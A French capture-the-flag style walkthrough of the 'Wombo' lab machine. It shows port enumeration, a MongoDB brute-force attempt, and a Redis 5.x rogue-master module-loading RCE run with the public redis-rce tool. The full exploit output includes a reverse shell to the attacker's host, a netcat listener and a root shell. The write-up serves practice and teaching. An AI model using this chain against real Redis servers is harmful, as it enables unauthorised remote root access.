Wombo

redis

Nom machine : Wombo
Difficulté : Facile
OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 05:34 EDT
Nmap scan report for 192.168.194.69
Host is up (0.032s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE  SERVICE    VERSION
22/tcp    open   ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
|   256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
|_  256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
80/tcp    open   http       nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
6379/tcp  open   redis      Redis key-value store 5.0.9
8080/tcp  open   http-proxy
|_http-title: Home | NodeBB
| http-robots.txt: 3 disallowed entries 
|_/admin/ /reset/ /compose
{...}
27017/tcp open   mongodb    MongoDB 4.0.18
| mongodb-databases: 
|   codeName = Unauthorized
|   ok = 0.0
|   code = 13
|_  errmsg = command listDatabases requires authentication
{...}

HTTP (80) : nginx 1.10.3

Gobuster ne donne aucun résultat

HTTP (8080) : NodeBB

Module de forum utilisant node.js

Mongodb (27017) : MongoDB 4.0.18

┌──(kali㉿kali)-[~]
└─$ nmap -n -sV --script mongodb-brute -p 27017 192.168.194.69
{...}
| mongodb-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 25452 guesses in 600 seconds, average tps: 44.4

Pas de résultat

Redis (6379) : Redis key-value store 5.0.9

Après une recherche rapide sur google, nous pouvons trouver un exploit.

https://github.com/Ridter/redis-rce/tree/master

Accès initial

Redis RCE exploit

Cloner le repo de redis-rce.py

GitHub - Ridter/redis-rce: Redis 4.x/5.x RCEGitHub

Cloner le repo de Redis-Modules-ExecuteCommand et compiler le module

GitHub - n0b0dyCN/RedisModules-ExecuteCommand: Tools, utilities and scripts to help you write redis modules!GitHub

──(kali㉿kali)-[~/exam/redis-rce]
└─$ python3 redis-rce.py -r 192.168.194.69 -L 192.168.45.195 -f module.so -v -P 22

█▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
█  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
█▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
█  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ 
  █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   
 ▀                                     ▀                   


[*] Connecting to  192.168.194.69:6379...
[<-] b'*1\r\n$4\r\nINFO\r\n'
[->] b'$3253\r\n# Server\r\nredis_version:5.0.9\r\nredis_git_sha1:00000000\r\nredis_git_dirty:0'......b'0\r\nmigrate_cached_sockets:0\r\nslave_expires_tracked_keys:0\r\nactive_defrag_hits:0\r'
[*] Sending SLAVEOF command to server
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.195\r\n$2\r\n22\r\n'
[->] b'\nactive_defrag_misses:0\r\nactive_defrag_key_hits:0\r\nactive_defrag_key_misses:0\r\n\r'......b'sed_cpu_user_children:0.000000\r\n\r\n# Cluster\r\ncluster_enabled:0\r\n\r\n# Keyspace\r\n\r\n'
[+] Accepted connection from 192.168.194.69:6379
[*] Setting filename
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$9\r\nmodule.so\r\n'
[->] b'+OK\r\n'
[+] Accepted connection from 192.168.194.69:6379
[*] Start listening on 192.168.45.195:22
[*] Tring to run payload
[+] Accepted connection from 192.168.194.69:33313
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\nba17637d170485de5612181350e60210ea253de8\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 0\r\n$47872\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb\xb3\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$11\r\n./module.so\r\n'
[->] b'+OK\r\n'
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[*] Closing rogue server...

[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: r
[*] Open reverse shell...
[*] Reverse server address: 192.168.45.195
[*] Reverse server port: 80
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$14\r\n192.168.45.195\r\n$2\r\n80\r\n'
[+] Reverse shell payload sent.
[*] Check at 192.168.45.195:80
[*] Clean up..
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$14\r\nrm ./module.so\r\n'

Nous avons lancé un listeneur au même moment.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 80  
listening on [any] 80 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.194.69] 37036
whoami
root
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@wombo:/# cat /root/proof.txt

Nous sommes root !

PrécédentVault SuivantZipper

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (80) : nginx 1.10.3

hashtagHTTP (8080) : NodeBB

hashtagMongodb (27017) : MongoDB 4.0.18

hashtagRedis (6379) : Redis key-value store 5.0.9

hashtagAccès initial

hashtagRedis RCE exploit